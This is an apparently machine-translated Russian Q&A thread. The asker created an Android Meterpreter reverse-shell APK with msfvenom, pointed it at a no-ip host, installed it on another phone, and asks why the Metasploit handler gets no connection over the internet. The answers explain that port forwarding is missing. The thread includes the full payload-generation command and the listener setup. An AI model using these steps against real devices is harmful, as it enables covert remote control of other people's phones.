Как правильно установить соединение с удаленным хостом без маршрутизатора?

прежде всего, это мой первый пост,
поэтому, пожалуйста, не игнорируйте это. Возможно, вы видели этот вопрос раньше.
Прежде чем пометить это как дубликат, пожалуйста, поймите мои проблемы.
У меня есть много вопросов. Я использую это в образовательных целях.

обратите внимание на следующее:

  1. у меня нет роутера.
  2. я установил Kali 2.0 (sana).
  3. я использую свой Android мобильный телефон для подключения к интернету через USB коновязь.

теперь я объясню, что было сделано.

first Я создал грузоподъемность Андроид

msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.net LPORT=4444 -o test1.apk

xxx.xxx.net является ли мой no-ip зарегистрированный dns (скрытый с x);
тогда я успешно подписал его.

теперь я отправил его на другое устройство Android через Bluetooth (так что IP-адрес моего устройства не изменился в процессе. Он также не подключен к локальной сети)
затем я успешно установил она.

ifconfig:

# ifconfig
eth0      Link encap:Ethernet  HWaddr 78:24:af:bc:a8:a2  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1072 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1072 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:87360 (85.3 KiB)  TX bytes:87360 (85.3 KiB)

usb0      Link encap:Ethernet  HWaddr 42:c8:eb:7b:43:a9  
          inet addr:192.168.42.50  Bcast:192.168.42.255  Mask:255.255.255.0
          inet6 addr: fe80::40c8:ebff:fe7b:43a9/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:20535 errors:21 dropped:0 overruns:0 frame:21
          TX packets:23085 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:11073420 (10.5 MiB)  TX bytes:3833297 (3.6 MiB)

затем я открыл терминал.

# msfconsole


 _____________

msf > use exploit/multi/handler
msf exploit(handler) 
set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(handler)
set lhost 192.168.42.50
lhost => 192.168.42.50
msf exploit(handler) 
set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.42.50:4444 
[*] Starting the payload handler...

после того, как я открыл приложение в целевой мобильный ничего не получено в
metasploit терминал.

однако то же самое работает нормально по локальной сети.
но когда дело доходит до Интернета, он терпит неудачу.
Я перепробовал почти все, что мог, но тщетно.

я обнаружил, что порты открыты в локальном IP-адресе.

# nmap 192.168.42.50

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:53 IST
Nmap scan report for kali (192.168.42.50)
Host is up (0.0000070s latency).
Not shown: 999 closed ports
PORT     STATE SERVICE
4444/tcp open  krb524

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds

но они закрыты в no-ip зарегистрированный DNS.

# nmap xxx.xxx.net

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-03-27 22:55 IST
Nmap scan report for xxx.xxx.net (a.b.c.d)
Host is up (0.22s latency).

rDNS record for a.b.c.d: static-a-b-c-d.ctrls.in

Not shown: 990 closed ports

PORT     STATE    SERVICE

21/tcp   filtered ftp
53/tcp   filtered domain
80/tcp   open     http
111/tcp  open     rpcbind
443/tcp  open     https
445/tcp  filtered microsoft-ds
554/tcp  filtered rtsp
1723/tcp filtered pptp
3306/tcp open     mysql
8022/tcp open     oa-system

Nmap done: 1 IP address (1 host up) scanned in 144.05 seconds

Примечание: a.b.С. d-разрешенный IP-адрес моего DNS

Итак, как именно я могу установить успешное соединение?

если вы думаете, в любом случае этот вопрос вне темы или что-то еще, пожалуйста, предложите мне решение.

29
задан Scott
03.12.2022 19:24 Количество просмотров материала 2727
Распечатать страницу

2 ответа

У вас есть роутер - телефон. Твой телефон маршруты между 192.168. адреса и интернет-адреса. Дело в том, что у вас нет порта, перенаправленного на ваш телефон. Вероятно, это возможно, но это будет нелегко. Вам, вероятно, понадобится root-доступ и использование iptables. В этот момент Вы, вероятно, захотите спросить на android.se, где вы, вероятно, получите лучший ответ.

Примечание: это звучит как проблема XY. Какова цель этого? Вероятно, есть лучший способ сделать чего ты хочешь.

0
отвечен Duncan X Simpson 2022-12-05 03:12

хорошо, позвольте мне взять на себя ответ на этот вопрос, но сначала я переформулирую то, что я думаю, что вы пытаетесь достичь, чтобы убедиться, что я не неправильно понимаю вещи.

У вас есть система с Kali linux, которая получает доступ в Интернет через USB-привязанный мобильный телефон, который обеспечивает RFC1918 (т. е. не интернет-маршрутизируемый) адрес 192.168.42.50.

вы настраиваете обратную оболочку android с помощью metasploit, указывая ваш интернет-адрес для маршрутизации

затем использование exploit / multi / handler для прослушивания порта 4444 на локальном не маршрутизируемом адресе.

проблема в том, что в то время как вы можете видеть ваш порт прослушивания в локальной сети, вы не можете увидеть его с подключенного к Интернету устройства, когда полезная нагрузка доставляется.

сканирование портов на маршрутизируемом адресе интернета не показывает открытых портов.

--

предполагая, что все правильно, то проблема в том, что вы не настроили "переадресацию портов" из интернета адрес локального экземпляра metasploit.

способ, которым это обычно делается, где у вас есть контроль над устройством, которое имеет интернет-адрес на одном из его интерфейсов, вы говорите ему, чтобы перенаправить порт 4444 / TCP от этого интерфейса к вашей внутренней системе на 192.168.42.50.

Если вы можете настроить это, то то то, что вы описываете, должно работать. Если у вас нет доступа для создания "переадресации портов", то то то, что вы описываете, не будет работать, как целевой эксплойт в Интернете не к чему подключаться.

0
отвечен Rоry McCune 2022-12-05 05:29

Постоянная ссылка на данную страницу: [ Скопировать ссылку | Сгенерировать QR-код ]

Ваш ответ

Опубликуйте как Гость или авторизуйтесь

Имя
Вверх